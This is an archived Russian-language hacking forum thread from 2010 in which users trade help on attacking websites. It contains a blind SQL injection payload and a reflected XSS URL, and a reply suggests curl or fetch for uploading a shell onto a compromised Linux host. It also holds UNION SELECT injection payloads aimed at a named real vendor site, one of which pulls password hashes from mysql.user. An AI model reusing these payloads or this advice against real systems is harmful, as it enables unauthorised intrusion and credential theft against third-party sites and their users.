ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12121  
Старый 22.03.2010, 17:43
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799

Репутация: 62
По умолчанию

LokbatanLi,юзай поиск... Читай : http://forum.antichat.ru/thread43966.html https://forum.antichat.ru/thread104591.html

Последний раз редактировалось -=Razor=-; 22.03.2010 в 17:50..
 
Ответить с цитированием

  #12122  
Старый 22.03.2010, 17:46
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Pashkela
Каким способом ты раскрутил эту инъекцию? Как это делать без подбора полей и т.д.? Мб есть линк на статью?

В этой скуле если искать количество полей через group by, то это 12, а если union select, то при вводе 12 появляется ошибка. Почему?
 
Ответить с цитированием

  #12123  
Старый 22.03.2010, 23:19
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию

ось линукс, имеется возможность выполнять системные команды. как закачать полноценный шелл? get и wget не работают...
 
Ответить с цитированием

  #12124  
Старый 22.03.2010, 23:26
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

curl, fetch
 
Ответить с цитированием

  #12125  
Старый 22.03.2010, 23:55
scorpic393
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258

Репутация: 5
По умолчанию

тренируюсь с блинд скулями в собсвенном скрипте.
1. нет нормальных статей по блинду
2. есть табла user с полем login и password

вот пример инжекта моего

http://localhost/index.php?id=1&act=news' and substring(version(),1,1)29=5+--+

помогите плиз состваить запроc на проверку 1-ого симвала логина или пасса. и дайти плиз ссылки на хорошие статьи
 
Ответить с цитированием

  #12126  
Старый 22.03.2010, 23:59
Life7
Banned
Регистрация: 14.06.2009
Сообщений: 256
Провел на форуме:
260151

Репутация: 105
По умолчанию

http://extensis.cnrc.navy.mil/index.htm?content=http://google.com

Помогите довести до ума
 
Ответить с цитированием

  #12127  
Старый 23.03.2010, 00:04
scorpic393
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258

Репутация: 5
По умолчанию

Цитата:
Сообщение от Life7  
http://extensis.cnrc.navy.mil/index.htm?content=http://google.com

Помогите довести до ума
вообщето это не инклуд а iframe

http://extensis.cnrc.navy.mil/index.htm?content=http://google.com'

так что доводить нечего...
 
Ответить с цитированием

  #12128  
Старый 23.03.2010, 02:15
BrainDeaD
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666

Репутация: 439


По умолчанию

Код:
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=%3Cscript%3Ealert()%3C/script%3E
со скулем можно что-то накрутить? и какие здесь вообще есть варианты?
 
Ответить с цитированием

  #12129  
Старый 23.03.2010, 02:30
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=1+union+select+1,2,3,version(),5,6,7,8,9,10+limit+1,1
 
Ответить с цитированием

  #12130  
Старый 23.03.2010, 12:40
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799

Репутация: 62
По умолчанию

Цитата:
Сообщение от BrainDeaD  
Код:
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=%3Cscript%3Ealert()%3C/script%3E
со скулем можно что-то накрутить? и какие здесь вообще есть варианты?
Код:
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=-1+union+select+1,2,3,password,5,6,7,8,9,10+from+mysql.user
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ